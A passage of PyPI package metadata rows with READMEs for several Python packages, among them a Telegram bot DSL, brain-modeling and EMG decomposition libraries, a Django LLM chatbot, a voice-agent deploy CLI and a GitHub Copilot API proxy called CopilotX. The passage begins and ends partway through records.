] | twine/6.2.0 CPython/3.10.4 | 2026-02-20T09:24:27.763238 | observellm-1.2.10.tar.gz | 130,520 | 11/77/f7fa3e7f890bbd3cb61ad98e19f69c893dcb67cfe8d6a8a571524699c1e6/observellm-1.2.10.tar.gz | source | sdist | null | false | ce17242324045ae53bf7265c26950f1c | 85cb313b625ba1181b1aa94ff3005f45a0def9bcfac9d4121d1f1a8353048941 | 1177f7fa3e7f890bbd3cb61ad98e19f69c893dcb67cfe8d6a8a571524699c1e6 | null | [
"LICENSE"
] | 0 |
2.4 | wetg | 7.0.1 | WETG v7 Super Weox — One-File Telegram Bot Engine. Write Telegram bots in a simple scripting language. | # 🔥 WETG v7 — Super Weox
> **One-File Telegram Bot Engine** — Write Telegram bots in a simple scripting language. No boilerplate. No classes. Just write.
```
pip install wetg
```
---
## ⚡ Quick Start
```bash
# Create a bot from template
wetg new mybot.wetg
# Edit it, add your token from @BotFather
nano mybot.wetg
# Run it
wetg run mybot.wetg
```
That's it.
---
## 📝 Language
### Hello World bot
```
bot "YOUR_TOKEN_HERE"
on /start
send "Hello, {user.name}! 👋"
on /ping
send "🏓 Pong!"
```
### Full feature example
```
bot "YOUR_TOKEN_HERE"
set welcome=Hello!
# ── Commands ──────────────────────────────
on /start
send "👋 Hi {user.name}! {welcome}"
on /help
send "/start\n/ping\n/echo\n/about"
on /ping
send "🏓 Pong!"
on /about
button = ["Our Website", "https://example.com"]
send "Powered by WETG v7 Super Weox." with button
on /echo
ask "What should I echo?"
# ── User messages ─────────────────────────
on usermsg
if {usermsg} == "hi"
send "Hey! 👋"
elif {usermsg} == "bye"
send "See ya! 👋"
else
send "You said: {usermsg}"
# ── Functions ─────────────────────────────
function welcome_user
send "Welcome, {user.name}!"
send "Your ID: {user.id}"
```
---
## 📖 Language Reference
### Token
```
bot "YOUR_TOKEN"
```
Or use `config.txt` (recommended — don't commit tokens to git):
```
TOKEN=YOUR_TOKEN
```
### Sending messages
| Syntax | Description |
|--------|-------------|
| `send "text"` | Plain message |
| `send "{user.name}"` | With variable interpolation |
| `send "**bold**" with markdown` | Markdown formatting |
| `send "<b>bold</b>" with html` | HTML formatting |
| `send "photo.jpg" with image` | Local image file |
| `send "https://..." with image` | Image from URL |
| `button = ["Label", "url"]` then `send "text" with button` | Inline button |
### Variables
| Variable | Value |
|----------|-------|
| `{user.name}` | User's first name |
| `{user.id}` | User's Telegram ID |
| `{user.username}` | User's @username |
| `{bot.name}` | Bot display name |
| `{bot.username}` | Bot @username |
| `{usermsg}` | Last message text from user |
### Control flow
```
if {usermsg} == "yes"
send "You said yes!"
elif {usermsg} == "no"
send "You said no."
else
send "You said something else."
```
### Loops
```
loop 5 times
send "Looping!"
stop
```
### Ask / input
```
on /form
ask "What's your name?"
on usermsg
send "Nice to meet you, {usermsg}!"
```
### Functions
```
function greet
send "Hi {user.name}!"
on /start
call greet
```
### Variables (set)
```
set counter=0
on /start
set counter=1
send "Counter is {counter}"
```
### Imports
```
import random
on /roll
send "🎲 {random.randint(1, 6)}"
```
---
## 🐍 Python API
```python
from wetg_superweox import Wetg
import asyncio
code = """
bot "YOUR_TOKEN"
on /start
send "Hello from Python API!"
"""
bot = Wetg(code)
bot.parse()
asyncio.run(bot.run())
```
Or use the helper:
```python
from wetg_superweox import run_file
run_file("mybot.wetg")
```
---
## 🛠 CLI
```
wetg run <file.wetg> Run a bot
wetg new <file.wetg> Create bot from template
wetg check <file.wetg> Validate .wetg file
wetg version Show version
wetg help Show help
```
Shortcuts:
```bash
wetg mybot.wetg # same as: wetg run mybot.wetg
python -m wetg_superweox run mybot.wetg
```
---
## 🔒 Tips
- Store tokens in `config.txt`, not in `.wetg` files
- Add to `.gitignore`:
```
config.txt
.env
```
---
## 📜 License
MIT
| text/markdown | null | null | null | null | MIT | telegram, bot, wetg, scripting, dsl | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Communications :: Chat",
"Topic :: Software Development :: Interpreters"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"python-telegram-bot>=20.0"
] | [] | [] | [] | [
"Homepage, https://github.com/weoxfx/wetg",
"Issues, https://github.com/weoxfx/wetg/issues"
] | twine/6.2.0 CPython/3.12.12 | 2026-02-20T09:24:10.260542 | wetg-7.0.1.tar.gz | 10,062 | bb/ca/affdcc0af1ba759f134f2194960e784fa75c37a43cd9f7e813b43b02d79f/wetg-7.0.1.tar.gz | source | sdist | null | false | 4a79587ec233fa4c03b223679aa0d97c | 293c6b0532abaa6d1af8a4b8f9c69fff8ced5951658e901d3ff7d032a00f0479 | bbcaaffdcc0af1ba759f134f2194960e784fa75c37a43cd9f7e813b43b02d79f | null | [
"LICENSE"
] | 249 |
2.4 | obi-one | 2026.2.3 | Standardized library of functions and workflows for biophysically-detailed brain modeling | # OBI-ONE
OBI-ONE is a standardized library of workflows for biophysically-detailed brain modeling, with the following features:
- Integration with a standardized cloud database for neuroscience and computational neuroscience through [**entitysdk**](github.com/openbraininstitute/entitysdk).
- Standardized provenence of workflows.
- Standardized parameter scans across different modeling workflows.
- Corresponding OpenAPI schema and service generated from Pydantic
<br>
# Installation
Pre-installation
```
brew install uv open-mpi boost cmake
```
Virtual environment (registered as a Jupyter kernel)
```
make install
```
<br>
# Examples
Notebooks are available in [**examples/**](examples/)
<br>
# Technical Overview / Glossary
The package is split into [**core/**](core/) and [**scientific/**](scientific/) code.
[**core/**](core/) defines the follow key classes:
- [**ScanConfig**](obi_one/core/scan_config.py): defines configurations for specific modeling use cases such as a [CircuitSimulationScanConfig](obi_one/scientific/simulation/simulations.py). A Form is composed of one or multiple Blocks (see next), which define the parameterization of a use case. Currently Forms can have both single Blocks and dictionaries of Blocks. Each Form, for example, has its own Initialize Block for specifying the base parameters of the use case. Dictionaries of Blocks of a particular type are used where the Form can accept an unspecified number of this Block type, such as Stimulus Blocks.
- [**Block**](obi_one/core/block.py): defines a component of a ScanConfig. Blocks are the components which support the specification of parameters which should be scanned over in the multi-dimensional parameter scan. When using the Form (in a Jupter Notebook for example). Any parameter which is specified as a list is used as a dimension of a multi-dimensional parameter scan when passed to a Scan object (see below).
- [**SingleConfig**](obi_one/core/single.py):
- [**Task**](obi_one/core/task.py):
- [**ScanGenerationTask**](obi_one/core/scan_generation_task.py): is an example task which takes a single ScanConfig as input, an output path and a string for specifying how output files should be stored. Then the function scan.execute() function can then be called which generates the multiple dimensional scan
<br>
# FAST API Service
Launch the FAST API Serive, with docs viewable at: http://127.0.0.1:8100/docs
```
make run-local
```
<br>
# Documentation
OBI-ONE uses [MkDocs](https://www.mkdocs.org/) with the [Material theme](https://squidfunk.github.io/mkdocs-material/) for documentation.
## Installing Documentation Dependencies
To install the documentation dependencies (MkDocs and MkDocs Material) without affecting your existing dependencies:
```bash
make install-docs
```
This command uses `uv sync --group docs` to add only the documentation dependencies to your environment, ensuring that other installed packages remain unchanged.
## Serving Documentation Locally
To build and serve the documentation locally for preview:
```bash
make serve-docs
```
This will start a local development server (typically at `http://127.0.0.1:8000`) where you can preview the documentation. The server will automatically reload when you make changes to the documentation files.
## Tags
Tags are metadata used to link documentation `.md` files to products. Each documentation file should include appropriate tags in its frontmatter to categorize and organize content.
## Continuous Integration
The documentation is automatically checked in CI on pull requests. The `.github/workflows/check-docs.yml` workflow:
1. Checks if any files in the `docs/` directory have been modified in the pull request
2. If no documentation changes are detected, the check fails with an error message
3. You can skip this check by adding the `skip docs` label to your pull request
This ensures that documentation is updated alongside code changes. The check only runs on pull requests targeting `main` and can be bypassed with the `skip docs` label when documentation updates are not needed.
<br>
# Contributions
Please see [**CONTRIBUTIONS.md**](CONTRIBUTIONS.md) for guidelines on how to contribute.
# Acknowledgements
Copyright © 2025 Open Brain Institute
| text/markdown | null | James Isbister <james.isbister@openbraininstitute.org>, Christoph Pokorny <christoph.pokorny@openbraininstitute.org>, Daniela Egas Santander <daniela.egassantander@openbraininstitute.org>, Gianluca Ficarelli <gianluca.ficarelli@openbraininstitute.org>, Michael Reimann <michael.reimann@openbraininstitute.org>, Darshan Mandge <darshan.mandge@openbraininstitute.org>, Ilkan Kilic <ilkan.kilic@openbraininstitute.org>, Aurélien Jaquier <aurelien.jaquier@openbraininstitute.org>, Dries Verachtert <dries.verachtert@openbraininstitute.org>, Jean-Denis Courcol <jean-denis.courcol@openbraininstitute.org>, Armando Romani <armando.romani@openbraininstitute.org>, Mike Geveart <michael.gevaert@openbraininstitute.org>, Nicolas Frank <nicolas.frank@openbraininstitute.org> | null | null | null | null | [
"Programming Language :: Python :: 3",
"Operating System :: OS Independent"
] | [] | null | null | <3.13,>=3.12.2 | [] | [] | [] | [
"pydantic>=2.10.6",
"pydantic-settings>=2.8.1",
"pydantic-core",
"brainbuilder>=0.20.2",
"bluepysnap>=3.0.2",
"fastapi",
"uvicorn",
"starlette",
"python-multipart",
"jupyter",
"notebook",
"jupyterlab>=4.4.8",
"ipykernel",
"sqlalchemy",
"blueetl",
"aiofiles",
"neurom",
"morph-tool",
"pyvista",
"entitysdk",
"obi-auth>=1.0.0",
"networkx>=3.4.2",
"pyjwt>=2.10.1",
"cachetools>=5.5.2",
"httpx>=0.28.1",
"bluepyefe>=2.3.51",
"connectome-utilities>=0.4.11",
"connectome-manipulator>=1.0.4",
"bluecellulab>=2.6.71",
"obi_notebook",
"morph_spines",
"caveclient>=7.11.0",
"obp-accounting-sdk>=0.5.0",
"connectome-analysis>=1.0.1; extra == \"connectivity\""
] | [] | [] | [] | [
"Homepage, https://github.com/openbraininstitute/obi-one",
"Issues, https://github.com/openbraininstitute/obi-one/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:23:58.055420 | obi_one-2026.2.3.tar.gz | 16,193,300 | 57/3a/563bc5c74c072fae9ca45ba58122ee4b0bd6095ed44b1afc9c5cf25af46b/obi_one-2026.2.3.tar.gz | source | sdist | null | false | ecf67172515cc8e618357f14d461b989 | 1a349db72eb8883f034c0dbe04b56de53b64a12aaec68768566f6305cd4bb5c2 | 573a563bc5c74c072fae9ca45ba58122ee4b0bd6095ed44b1afc9c5cf25af46b | Apache-2.0 | [
"LICENSE"
] | 175 |
2.4 | swarm-contrastive-decomposition | 0.1.3 | Decomposition of Neurophysiological Time Series Signals with a Particle Swarm Optimised Independence Estimator | # Swarm-Contrastive Decomposition 🧠
[](https://pypi.org/project/swarm-contrastive-decomposition/)
[](https://www.python.org/downloads/)
[](https://creativecommons.org/licenses/by-nc/4.0/)
A Python package for decomposition of neurophysiological time series signals using a Particle Swarm Optimised Independence Estimator for Blind Source Separation.
<div align="center">
<img src="images/pipeline.png" alt="Pipeline" width="500"/>
</div>
## Table of Contents 📚
- [Installation](#installation)
- [Quick Start](#quick-start)
- [Usage](#usage)
- [Configuration](#configuration)
- [Test Data](#test-data)
- [Contributing](#contributing)
- [License](#license)
- [Citation](#citation)
- [Contact](#contact)
## Installation 🛠️
### From PyPI (Recommended)
```bash
pip install swarm-contrastive-decomposition
```
### From GitHub (Latest Development Version)
```bash
pip install git+https://github.com/AgneGris/swarm-contrastive-decomposition.git
```
### From Source
```bash
git clone https://github.com/AgneGris/swarm-contrastive-decomposition
cd swarm-contrastive-decomposition
pip install -e .
```
### Verify Installation
```bash
python -c "import scd; print(f'SCD version: {scd.__version__}')"
```
## Quick Start 🚀
```python
import scd
# Train with default configuration
dictionary, timestamps = scd.train("data/input/emg.npy")
# Save results
scd.save_results("data/output/emg.pkl", dictionary)
```
## Usage
### Basic Usage
```python
import scd
# Use a predefined configuration
dictionary, timestamps = scd.train(
"path/to/your/data.mat",
config_name="surface" # or "default", "intramuscular"
)
scd.save_results("output.pkl", dictionary)
```
### With Configuration Overrides
```python
import scd
# Override specific parameters
dictionary, timestamps = scd.train(
"data/input/emg.npy",
config_name="surface",
max_iterations=100, # override for quick testing
output_final_source_plot=True
)
```
### Step-by-Step Control
```python
import scd
# Load configuration
config = scd.load_config("surface")
# Load data
neural_data = scd.load_data("data/input/emg.npy", device=config.device)
# Preprocess
neural_data = scd.preprocess_data(neural_data, config)
# Train model
dictionary, timestamps = scd.train_model(neural_data, config)
# Save results
scd.save_results("output.pkl", dictionary)
```
### Supported Data Formats
- `.mat` — MATLAB files (specify the variable name with `key` parameter)
- `.npy` — NumPy arrays
```python
# For .mat files with custom variable name
dictionary, timestamps = scd.train("data.mat", key="emg_data")
# For .npy files
dictionary, timestamps = scd.train("data.npy")
```
Data should have shape `(time, channels)` or `(channels, time)` — the loader will automatically transpose if needed.
## Configuration ⚙️
Configurations are defined in `scd/configs.json`. Available presets:
| Config Name | Use Case | Sampling Rate | Description |
|-------------|----------|---------------|-------------|
| `default` | General purpose | 10240 Hz | Balanced settings for most EMG data |
| `surface` | Surface EMG | 10240 Hz | Optimized for surface recordings |
| `intramuscular` | Intramuscular EMG | 10240 Hz | Higher iterations for fine-wire recordings |
### Configuration Parameters
| Parameter | Description | Default |
|-----------|-------------|---------|
| `device` | `"cuda"` for GPU or `"cpu"` | `"cuda"` |
| `acceptance_silhouette` | Quality threshold for source acceptance | `0.85` |
| `extension_factor` | Typically `1000 / num_channels`. Higher values may improve results | `25` |
| `low_pass_cutoff` | Low-pass filter cutoff frequency (Hz) | `4400` |
| `high_pass_cutoff` | High-pass filter cutoff frequency (Hz) | `10` |
| `sampling_frequency` | Sampling frequency of your signal (Hz) | `10240` |
| `start_time` | Start time for signal trimming (s). Use `0` for beginning | `0` |
| `end_time` | End time for signal trimming (s). Use `-1` for entire signal | `-1` |
| `max_iterations` | Maximum decomposition iterations | `200` |
| `peel_off_window_size_ms` | Window size for spike-triggered average (ms) | `20` |
| `output_final_source_plot` | Generate plot of final sources | `false` |
| `use_coeff_var_fitness` | Use coefficient of variation fitness. `true` for EMG, `false` for intracortical | `true` |
| `remove_bad_fr` | Filter sources with firing rates < 2 Hz or > 100 Hz | `true` |
| `clamp_percentile` | Percentile for amplitude clamping | `0.999` |
### Custom Configuration
Add your own configuration to `scd/configs.json`:
```json
{
"my_experiment": {
"device": "cuda",
"acceptance_silhouette": 0.80,
"extension_factor": 30,
"sampling_frequency": 2048,
...
}
}
```
Then use it:
```python
dictionary, timestamps = scd.train("data.mat", config_name="my_experiment")
```
## Test Data 🧪
The repository includes test data to verify your installation:
- **File:** `data/input/emg.npy`
- **Type:** Surface EMG
- **Sampling rate:** 10240 Hz
- **Configuration:** Use `"surface"` config
```python
import scd
# Run with test data
dictionary, timestamps = scd.train(
"data/input/emg.npy",
config_name="surface"
)
print(f"Found {len(dictionary)} motor units")
```
## Contributing 🤝
We welcome contributions! Here's how you can contribute:
1. Fork the repository
2. Create a feature branch (`git checkout -b feature/newfeature`)
3. Commit your changes (`git commit -m 'Add some newfeature'`)
4. Push to the branch (`git push origin feature/newfeature`)
5. Open a pull request
## License 📜
This project is licensed under the CC BY-NC 4.0 License.
## Citation
If you use this code in your research, please cite our paper:
```bibtex
@article{grison2024particle,
author={Grison, Agnese and Clarke, Alexander Kenneth and Muceli, Silvia and Ibáñez, Jaime and Kundu, Aritra and Farina, Dario},
journal={IEEE Transactions on Biomedical Engineering},
title={A Particle Swarm Optimised Independence Estimator for Blind Source Separation of Neurophysiological Time Series},
year={2024},
volume={},
number={},
pages={1-11},
doi={10.1109/TBME.2024.3446806},
keywords={Recording; Time series analysis; Sorting; Vectors; Measurement; Electrodes; Probes; Independent component analysis; particle swarm optimisation; blind source separation; intramuscular electromyography; intracortical recording}
}
```
## Contact
For questions or inquiries:
**Agnese Grison**
📧 agnese.grison16@imperial.ac.uk
| text/markdown | null | Agnese Grison <agnese.grison16@imperial.ac.uk> | null | null | CC-BY-NC-4.0 | EMG, neural signals, decomposition, particle swarm, ICA, blind source separation | [
"Development Status :: 4 - Beta",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Topic :: Scientific/Engineering :: Bio-Informatics"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"numpy>=1.20.0",
"torch>=1.9.0",
"scipy>=1.7.0",
"h5py>=3.0.0",
"mat73>=0.59",
"matplotlib>=3.5.0",
"pytest>=7.0; extra == \"dev\"",
"black>=23.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/AgneGris/swarm-contrastive-decomposition",
"Repository, https://github.com/AgneGris/swarm-contrastive-decomposition",
"Issues, https://github.com/AgneGris/swarm-contrastive-decomposition/issues"
] | twine/6.2.0 CPython/3.10.13 | 2026-02-20T09:23:36.881937 | swarm_contrastive_decomposition-0.1.3.tar.gz | 22,369 | 16/62/074eb3da693db0fbd76351a1f51d4e597145e14cf804ce9525b05b5abbbc/swarm_contrastive_decomposition-0.1.3.tar.gz | source | sdist | null | false | 54b111dd5bcc419bd6da9ed3b8eb023f | dac66aef4d0978c0fabcc30c67e6a17af75009cea0d004345c2287770973352c | 1662074eb3da693db0fbd76351a1f51d4e597145e14cf804ce9525b05b5abbbc | null | [
"LICENSE"
] | 218 |
2.4 | django-ai-chatbot | 0.1.0 | AI chatbot assistant for Django/DRF that analyzes your project models and responds to queries | # Django AI Chatbot Assistant
An intelligent AI chatbot package for Django/DRF that analyzes your project's models and data to provide context-aware responses. Integrates with HuggingFace LLMs and optional Tavily web search.
## Features
- 🤖 **HuggingFace Integration**: Use any HuggingFace model for responses
- 📊 **Auto Model Discovery**: Automatically introspects Django models and fields
- 🌐 **Web Search**: Optional Tavily API integration for current web data
- ⚙️ **Easy Configuration**: Simple Django settings integration
- 🔒 **Model Filtering**: Control which models the chatbot can access
## Installation
```bash
pip install django-ai-chatbot
```
## Quick Start
### 1. Add to Django Settings
```python
# settings.py
INSTALLED_APPS = [
# ... other apps
'ai_chatbot',
]
# Required: HuggingFace Configuration
AI_CHATBOT_HF_API_KEY = 'your-huggingface-api-key'
AI_CHATBOT_HF_MODEL = 'mistralai/Mistral-7B-Instruct-v0.2' # Optional, this is default
# Optional: Tavily Web Search
AI_CHATBOT_TAVILY_API_KEY = 'your-tavily-api-key' # Optional
# Optional: Restrict which models the chatbot can access
AI_CHATBOT_ALLOWED_MODELS = [
'myapp.User',
'myapp.Product',
'blog.Post',
] # If empty or not set, all models are accessible
```
### 2. Use in Your Code
```python
from ai_chatbot import AIChatbot
# Initialize chatbot
chatbot = AIChatbot()
# Ask a question about your models
response = chatbot.ask("What fields does the User model have?")
print(response)
# Use web search for current information
response = chatbot.ask(
"What are the latest trends in Django development?",
use_web_search=True
)
print(response)
# Customize generation parameters
response = chatbot.ask(
"Explain the Product model structure",
max_tokens=1000,
temperature=0.5
)
```
### 3. Example in Django View
```python
from django.http import JsonResponse
from ai_chatbot import AIChatbot
def chatbot_view(request):
query = request.GET.get('query', '')
use_web = request.GET.get('web_search', 'false').lower() == 'true'
chatbot = AIChatbot()
response = chatbot.ask(query, use_web_search=use_web)
return JsonResponse({'response': response})
```
### 4. Example in DRF ViewSet
```python
from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework import viewsets
from ai_chatbot import AIChatbot
class ChatbotViewSet(viewsets.ViewSet):
@action(detail=False, methods=['post'])
def ask(self, request):
query = request.data.get('query')
use_web = request.data.get('use_web_search', False)
chatbot = AIChatbot()
response = chatbot.ask(query, use_web_search=use_web)
return Response({'response': response})
```
## Configuration Options
| Setting | Required | Default | Description |
|---------|----------|---------|-------------|
| `AI_CHATBOT_HF_API_KEY` | Yes | None | Your HuggingFace API key |
| `AI_CHATBOT_HF_MODEL` | No | `mistralai/Mistral-7B-Instruct-v0.2` | HuggingFace model to use |
| `AI_CHATBOT_TAVILY_API_KEY` | No | None | Tavily API key for web search |
| `AI_CHATBOT_ALLOWED_MODELS` | No | `[]` (all models) | List of models to expose (format: `app.Model`) |
## API Reference
### AIChatbot.ask()
```python
chatbot.ask(
query: str,
use_web_search: bool = False,
max_tokens: int = 500,
temperature: float = 0.7
) -> str
```
**Parameters:**
- `query`: The user's question
- `use_web_search`: Enable Tavily web search
- `max_tokens`: Maximum tokens in response
- `temperature`: LLM temperature (0.0-1.0)
**Returns:** Generated response string
## How It Works
1. **Model Introspection**: Automatically discovers all Django models and their fields
2. **Context Building**: Creates a schema context from your models
3. **Web Search** (optional): Fetches current web data via Tavily
4. **LLM Generation**: Sends context + query to HuggingFace model
5. **Response**: Returns AI-generated answer based on your project data
## Requirements
- Python >= 3.8
- Django >= 3.2
- huggingface-hub >= 0.19.0
- requests >= 2.31.0
## License
MIT License - see LICENSE file for details
## Contributing
Contributions welcome! Please open an issue or submit a PR.
## Support
For issues and questions: https://github.com/hitenjoshi/django-ai-chatbot/issues
| text/markdown | null | Hiten Joshi <hiten.mmt@gmail.com> | null | null | MIT | ai, chatbot, django, drf, artificial-intelligence, huggingface, tavily | [
"Framework :: Django",
"Framework :: Django :: 3.2",
"Framework :: Django :: 4.0",
"Framework :: Django :: 5.0",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Intended Audience :: Developers",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"django>=3.2",
"huggingface_hub-1.4.0",
"requests>=2.31.0",
"pytest>=7.0.0; extra == \"dev\"",
"pytest-django>=4.5.0; extra == \"dev\"",
"black>=23.0.0; extra == \"dev\"",
"flake8>=6.0.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/hitenjoshi/django-ai-chatbot",
"Repository, https://github.com/hitenjoshi/django-ai-chatbot",
"Issues, https://github.com/hitenjoshi/django-ai-chatbot/issues"
] | twine/6.2.0 CPython/3.11.9 | 2026-02-20T09:23:35.122283 | django_ai_chatbot-0.1.0.tar.gz | 7,033 | 18/13/cebc22ad641f925a57c8f373b564514b40741a4e12b46d9ce8baa2efa49d/django_ai_chatbot-0.1.0.tar.gz | source | sdist | null | false | 1a4b1f5919b885267518a5ec902900ae | 8c776982309a20f82575f1e6a8a4850ef2ab0849d89346d87687325361f7c3a3 | 1813cebc22ad641f925a57c8f373b564514b40741a4e12b46d9ce8baa2efa49d | null | [
"LICENSE"
] | 241 |
2.4 | moss-agent-cli | 0.2.2 | CLI tool for deploying Moss voice agents | # Moss Agent CLI
Command-line tool for deploying voice agents to the Moss platform.
## Installation
```bash
pip install moss-agent-cli
```
Or install from source:
```bash
cd moss-agent-cli
pip install -e .
```
## Usage
### Deploy Command
Deploy your agent to the Moss platform:
```bash
moss-agent deploy
```
### Required Environment Variables
Set these environment variables or pass as CLI options:
```bash
export MOSS_PROJECT_ID="your-project-id"
export MOSS_PROJECT_KEY="your-project-key"
export MOSS_VOICE_AGENT_ID="your-voice-agent-id"
```
Or pass as options:
```bash
moss-agent deploy \
--project-id "your-project-id" \
--project-key "your-project-key" \
--voice-agent-id "your-voice-agent-id"
```
### Agent Structure
Your agent directory must contain an entry point file that imports from `moss_voice_agent_manager`:
**Simple structure:**
```
my-agent/
├── agent.py # Entry point (uses MossAgentSession)
├── requirements.txt # Optional: Additional dependencies
└── tools/ # Optional: Custom tools
└── my_tools.py
```
**Or with main.py:**
```
my-agent/
├── main.py # Entry point
├── requirements.txt
└── ...
```
**Or with src structure:**
```
my-agent/
├── src/
│ └── my_agent/
│ └── main.py # Entry point
├── requirements.txt
└── ...
```
#### Example agent.py
```python
from moss_voice_agent_manager import MossAgentSession
def get_weather(city: str) -> str:
"""Get weather for a city."""
return f"Weather in {city} is sunny"
session = MossAgentSession(
function_tools=[get_weather],
max_tool_steps=10,
)
if __name__ == "__main__":
session.run()
```
## CLI Options
```
moss-agent deploy [OPTIONS] [DIRECTORY]
Arguments:
DIRECTORY Agent directory to deploy (defaults to current directory)
Options:
--project-id, -p TEXT Moss project ID (or set MOSS_PROJECT_ID env var)
--project-key, -k TEXT Moss project key (or set MOSS_PROJECT_KEY env var)
--voice-agent-id, -v TEXT Voice agent ID (or set MOSS_VOICE_AGENT_ID env var)
--api-url TEXT Moss platform API URL (defaults to production)
--help Show this message and exit
```
## What Gets Deployed
When you run `moss-agent deploy`, the CLI:
1. **Validates** your agent structure
2. **Packages** your agent directory (excluding .env, __pycache__, .git, etc.)
3. **Uploads** the package to Moss platform
4. **Deploys** to LiveKit Cloud
Your agent code is deployed as-is - no modification or generation.
## Excluded Files
The following files/directories are automatically excluded from deployment:
- `.env` - Environment variables (secrets)
- `__pycache__/` - Python cache
- `.git/` - Git repository
- `*.pyc` - Compiled Python files
- `.venv/`, `venv/` - Virtual environments
- `.DS_Store` - macOS metadata
## Development
Install in development mode:
```bash
cd moss-agent-cli
pip install -e .
```
Run the CLI:
```bash
moss-agent deploy
```
## License
MIT
| text/markdown | null | Moss Team <support@moss.dev> | null | null | MIT | null | [] | [] | null | null | >=3.10 | [] | [] | [] | [
"typer>=0.9.0",
"rich>=13.0.0",
"httpx>=0.27.0",
"python-dotenv>=1.0.0"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.13.11 | 2026-02-20T09:22:31.534536 | moss_agent_cli-0.2.2.tar.gz | 7,980 | 63/c2/7894760d17c1daee23624d5f2c9a47723eb8b56644c4806153f543449f7d/moss_agent_cli-0.2.2.tar.gz | source | sdist | null | false | 0ac0fe35e7e5ece0e11cb7c34daa986c | cc4ed7e86d88f6dfcf60a6070908efafd081a6d2cebeaa21a0710830cd0f745a | 63c27894760d17c1daee23624d5f2c9a47723eb8b56644c4806153f543449f7d | null | [] | 216 |
2.4 | copilotx | 2.3.3 | Local GitHub Copilot API proxy — use GPT-4o, Claude, Gemini via OpenAI/Anthropic compatible APIs | # 🚀 CopilotX
Local & Remote GitHub Copilot API proxy — use GPT-4o, Claude, Gemini and more via OpenAI/Anthropic compatible APIs.
Turn your GitHub Copilot subscription into an AI API server. Use **any model** available through Copilot with **any tool** that supports OpenAI or Anthropic SDKs — locally or on a remote VM.
## ✨ Features
- 🔐 **GitHub OAuth** — One-command login via Device Flow, or use existing token
- 🔄 **Auto Token Refresh** — Copilot JWT refreshed transparently before expiry
- 🔌 **Triple API Format** — OpenAI `/v1/chat/completions` + `/v1/responses` + Anthropic `/v1/messages`
- 🌊 **SSE Streaming** — Real-time streaming responses for all formats
- 👁️ **Vision Support** — Pass images through Responses API (auto-detected)
- 🎯 **Dynamic API URL** — Auto-discovers correct Copilot API endpoint per account type
- 📋 **Model Discovery** — Auto-fetch available models from Copilot
- ⚡ **Zero Config** — `pip install` → `auth login` → `serve` → done
- 🌐 **Remote Deploy** — Serve on `0.0.0.0` with API key protection, deploy behind Caddy for auto-HTTPS
## 🚀 Quick Start
### 1. Install
```bash
pip install copilotx
# or
uv pip install copilotx
```
### 2. Authenticate
```bash
# Option A: OAuth Device Flow (recommended)
copilotx auth login
# → Opens browser for GitHub authorization
# Option B: Use existing GitHub token
copilotx auth login --token ghp_xxxxx
# or
export GITHUB_TOKEN=ghp_xxxxx && copilotx auth login
```
### 3. Start Server
```bash
copilotx serve
```
Output:
```
🚀 CopilotX v2.3.3
✅ Copilot Token valid (28m remaining, auto-refresh)
� Local mode (localhost only)
🎯 API: api.enterprise.githubcopilot.com (auto-detected)
📋 Models: claude-opus-4.6, gpt-5-mini, gpt-5, gemini-2.5-pro, ...
📁 Port info: ~/.copilotx/server.json
🔗 OpenAI Chat: http://127.0.0.1:24680/v1/chat/completions
🔗 Responses: http://127.0.0.1:24680/v1/responses
🔗 Anthropic API: http://127.0.0.1:24680/v1/messages
🔗 Models: http://127.0.0.1:24680/v1/models
Press Ctrl+C to stop
```
### 4. Use It
**Python (OpenAI SDK):**
```python
from openai import OpenAI
client = OpenAI(base_url="http://localhost:24680/v1", api_key="copilotx")
response = client.chat.completions.create(
model="gpt-4o",
messages=[{"role": "user", "content": "Hello!"}],
stream=True,
)
for chunk in response:
print(chunk.choices[0].delta.content or "", end="")
```
**Python (Anthropic SDK):**
```python
from anthropic import Anthropic
client = Anthropic(base_url="http://localhost:24680", api_key="copilotx")
message = client.messages.create(
model="claude-sonnet-4",
max_tokens=1024,
messages=[{"role": "user", "content": "Hello!"}],
)
print(message.content[0].text)
```
**Claude Code:**
```bash
# Set environment variables
export ANTHROPIC_BASE_URL=http://localhost:24680
export ANTHROPIC_API_KEY=copilotx
claude
```
**Codex CLI (uses Responses API):**
```bash
export OPENAI_BASE_URL=http://localhost:24680/v1
export OPENAI_API_KEY=copilotx
codex
```
> Codex CLI uses the `/v1/responses` endpoint natively. CopilotX v2.1.0+ supports this
> including streaming, vision input, and `apply_patch` tool invocation.
**Python (OpenAI Responses API):**
```python
from openai import OpenAI
client = OpenAI(base_url="http://localhost:24680/v1", api_key="copilotx")
response = client.responses.create(
model="gpt-5-mini",
input="Explain quicksort in 3 sentences.",
)
print(response.output_text)
```
**cURL:**
```bash
curl http://localhost:24680/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "gpt-4o",
"messages": [{"role": "user", "content": "Hello!"}]
}'
```
## 📡 API Endpoints
| Endpoint | Method | Description |
|----------|--------|-------------|
| `/v1/chat/completions` | POST | OpenAI-compatible chat completions |
| `/v1/responses` | POST | OpenAI Responses API (streaming, vision, tools) |
| `/v1/messages` | POST | Anthropic-compatible messages |
| `/v1/models` | GET | List available models |
| `/health` | GET | Server health + token status |
## 🔧 CLI Commands
```bash
copilotx auth login # OAuth Device Flow login
copilotx auth login --token XXX # Quick login with existing token
copilotx auth status # Show auth status
copilotx auth logout # Clear credentials
copilotx models # List available models
copilotx serve # Start server (default: 127.0.0.1:24680)
